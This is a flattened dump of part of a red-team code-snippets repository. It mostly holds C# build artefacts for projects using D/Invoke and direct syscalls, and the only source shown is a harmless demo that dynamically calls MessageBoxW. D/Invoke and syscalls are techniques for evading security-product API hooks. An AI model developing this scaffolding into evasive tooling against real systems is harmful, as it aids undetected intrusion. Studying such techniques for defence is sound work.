/C#/CreateProcess/CreateProcess/obj/CreateProcess.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | b351b3d00ca3c03e51b59834718911d9c23098dd 2 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = CreateProcess 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\CreateProcess\CreateProcess\ 4 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.assets.cache -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 3fadf03217e11926521b06ed9b8085675261cf23 2 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.dll -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 3881e9f28961f9ea3c56435a33a20e8625ca3050 2 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.pdb -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "saUOiuZs4N1XGJjv8U8hSTphYX/o7jDBupib+9SsVYrMLsjiGA5Ef9mmzG37uAFnWIrBwREfu6Zl4SY+Vdtdpg==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\CreateProcess\\CreateProcess\\CreateProcess.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/CreateProcess/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | 10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "dependencies": { 11 | "DInvoke": "1.0.0.0" 12 | }, 13 | "runtime": { 14 | "ConsoleApp1.dll": {} 15 | } 16 | }, 17 | "DInvoke/1.0.0.0": { 18 | "runtime": { 19 | "DInvoke.dll": { 20 | "assemblyVersion": "1.0.0.0", 21 | "fileVersion": "1.0.0.0" 22 | } 23 | } 24 | } 25 | } 26 | }, 27 | "libraries": { 28 | "ConsoleApp1/1.0.0": { 29 | "type": "project", 30 | "serviceable": false, 31 | "sha512": "" 32 | }, 33 | "DInvoke/1.0.0.0": { 34 | "type": "reference", 35 | "serviceable": false, 36 | "sha512": "" 37 | } 38 | } 39 | } -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\CreateProcess_DInvoke\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268 2 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 3b5c6a64568502b382a025d7d63fc56001b8cfc2 2 | -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "s0Rx2AjoogtPrzhPqICiGoIAaOhAaXq7236tFh1d2TUSXH6RhgLHIZ70CFol5UH1GdlgyQTBfhaddK/3tF5Lag==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\CreateProcess_DInvoke\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/CreateProcess_DInvoke/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/MessageBoxW_DInvoke.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | 10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | using DInvoke.DynamicInvoke; 5 | 6 | namespace MessageBoxW_DInvoke 7 | { 8 | class Program 9 | { 10 | [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode)] 11 | delegate int MessageBoxW(IntPtr hWnd, string lpText, string pCaption, uint uType); 12 | static void Main(string[] args) 13 | { 14 | var parameters = new object[] { IntPtr.Zero, "My first D/Invoke!", "Hello world!", (uint)0 }; 15 | Generic.DynamicAPIInvoke("user32.dll", "MessageBoxW", typeof(MessageBoxW), ref parameters); 16 | 17 | } 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "MessageBoxW_DInvoke/1.0.0": { 10 | "dependencies": { 11 | "DInvoke": "1.0.0.0" 12 | }, 13 | "runtime": { 14 | "MessageBoxW_DInvoke.dll": {} 15 | } 16 | }, 17 | "DInvoke/1.0.0.0": { 18 | "runtime": { 19 | "DInvoke.dll": { 20 | "assemblyVersion": "1.0.0.0", 21 | "fileVersion": "1.0.0.0" 22 | } 23 | } 24 | } 25 | } 26 | }, 27 | "libraries": { 28 | "MessageBoxW_DInvoke/1.0.0": { 29 | "type": "project", 30 | "serviceable": false, 31 | "sha512": "" 32 | }, 33 | "DInvoke/1.0.0.0": { 34 | "type": "reference", 35 | "serviceable": false, 36 | "sha512": "" 37 | } 38 | } 39 | } -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.exe -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 43c8296b4e0a8fdf49a8348a6a774af279b8e8ec 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = MessageBoxW_DInvoke 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke\MessageBoxW_DIvoke\MessageBoxW_DIvoke\ 4 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.assets.cache -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CopyComplete -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 8080b4b6e0ab0736b80891287505de97fbf66b6c 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 0a28cd972ee4b2cfc5ff5e631d3d6ec2b8dd35a3 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | f1d791e42d3bccd1c48106d85910be18dbf5cba6 2 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = MessageBoxW_DIvoke 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke\MessageBoxW_DIvoke\MessageBoxW_DIvoke\ 4 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.assets.cache -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 | MBRSC -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/MessageBoxW_DInvoke.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/MessageBoxW_DIvoke.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "dxJv26YaFJvd5EeJoi/kq1XCYG6OAtayh6Z4OWkVUt5fmhy1yk8PQULjnZic8qEi8RGRncwiqV4zWb6W/GZkBw==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\DIvoke\\MessageBoxW_DIvoke\\MessageBoxW_DIvoke\\MessageBoxW_DInvoke.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | 10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "dependencies": { 11 | "DInvoke": "1.0.0.0" 12 | }, 13 | "runtime": { 14 | "ConsoleApp1.dll": {} 15 | } 16 | }, 17 | "DInvoke/1.0.0.0": { 18 | "runtime": { 19 | "DInvoke.dll": { 20 | "assemblyVersion": "1.0.0.0", 21 | "fileVersion": "1.0.0.0" 22 | } 23 | } 24 | } 25 | } 26 | }, 27 | "libraries": { 28 | "ConsoleApp1/1.0.0": { 29 | "type": "project", 30 | "serviceable": false, 31 | "sha512": "" 32 | }, 33 | "DInvoke/1.0.0.0": { 34 | "type": "reference", 35 | "serviceable": false, 36 | "sha512": "" 37 | } 38 | } 39 | } -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | 